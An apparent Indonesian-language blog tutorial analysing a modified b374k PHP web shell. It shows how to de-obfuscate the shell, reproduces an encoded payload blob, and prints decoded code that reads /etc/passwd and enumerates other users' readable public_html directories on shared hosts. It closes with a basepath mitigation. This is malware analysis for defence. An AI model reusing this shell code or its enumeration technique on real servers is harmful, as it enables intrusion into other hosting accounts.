--[ Pendahuluan
Beberapa waktu lalu, saya mendapatkan sample php shell b374k modifikasi yang
diberi nama "syndrom2211 edition". Shell ini memiliki fitur baru yaitu teknik
jumping yang pada prinsipnya cukup sederhana.
--[ Langkah-langkah
* Decode php shell b374k syndrom2211 dengan mengganti bagian "eval(gzinflate(
base64_decode" menjadi "echo gzinflate(base64_decode" dan jangan lupa hilang
kan satu tanda tutup kurung ")" pada bagian akhir scriptnya.
* Setelah proses decoding, kita dapat melihat variabel "jumper" yang di-encode
menggunakan base64
$jumper="3VRRb5swEP4rFwvNRqVAtkmTEiCTpk7aHjppe5rSiBlsilfAyDZrs2r/fefQpM3Lf sCEMObuu++7Ox/IutVAMserTkLdcWvzG1L3otIPN6TInMFbQK07O/IBXa/RStbAAttDDmpQ5a1 0jFreyLLXQtIQ8hzSEDYwQ6huGroCoSQjV8Zos4JvRzC6vwxZ4kSBi/GLT6PIhPp1ykUNjUbNb VlWb969vYN+OSwh89mcILd8z32yHFojm5xuaEHi4OGa9zImWcKR2OMLuBLKKX1dlrssQY0CzpR +zjTwGZ8db+HTIPQgreJ3E7yq9bhfA4kFd5LR7zRyqpcsDGMCz1qwvgxhpibhGqx0pYeVneqVY yma3gcjit0LrLzRoxwYTaSrk9lII2ooglQDbPEEDOHR9w4Y2V7u4NBAWMEHPYnhh4Ovkgt4wfD /9vIPBONUYdu4MXzP0BJMVhp7Zqn10JwZFL6la7hvVSfZopG6Yce+ho84oM74g8AJtif73H6ML GCZph41aq+CWNwwHxPRFT0mMGCy3jtV6Ji9aeRDPEAo89t/Akmre5nQ+BQR0wSr6VRdtq7vEjq LsmfGBUZRn6O3K1saPGh/nuzA6R2HIstxsu0cZqNTNEq/9KJSNIf5NvorUBcXft9o5K1beGIAb ueikF76/wLdftTTIGCxg+NAkM0+PyvnvBRS/MOZHOanMgX14pviLw==";
* Jika variabel tersebut di-decode dan di-gzinflate, maka hasilnya adalah
sebagai berikut:
3 set_time_limit(0); 4 @$passwd = fopen('/etc/passwd', 'r'); 5 if(!$passwd){ 6 die("[...]"); 7 } 8 $pub = array(); 9 $users = array(); 10 $conf = array(); 11 $i = 0; 12 while(!feof($passwd)){ 13 $str = fgets($passwd); 14 if($i > 100) { 15 $pos = strpos($str, ':'); 16 $username = substr($str, 0, $pos); 17 $dirz = '/home/'.$username.'/public_html/'; 18 if(($username != '')) { 19 if(is_readable($dirz)) { 20 array_push($users, $username); 21 array_push($pub, $dirz); 22 } 23 } 24 } 25 $i++; 26 } 27 foreach($users as $user){ 28 echo '[Found !] <a href="?y=/home/'.$user.'/public_html">/home/' \ .$user.'/public_html/</a><br>';
* Dari potongan kode di atas, bisa terlihat, jika teknik jumper yang dimaksud
adalah dengan membaca nama user dari file "/etc/passwd" lalu setelah
mendapatkan daftar user, maka kemudian akan memeriksa apakah direktori
"/home/user/public_html" dapat dibaca. Jika dapat dibaca, maka hal tersebut
akan ditampilkan pada output.
* Untuk menanggulangi hal tersebut, kita bisa membatasi akses script php
sehingga tidak dapat membaca file "/etc/passwd". Ini misalnya bisa diperoleh
dengan mengatur basepath php.
--[ Penutup
Sekian tutorial singkat kali ini, semoga bermanfaat. Terima kasih kepada Tuhan
Yang Maha Esa, om Sakitjiwa, om Siddiq, RNDC, Maxindo, dan Anda :-)
Tidak ada komentar:
Posting Komentar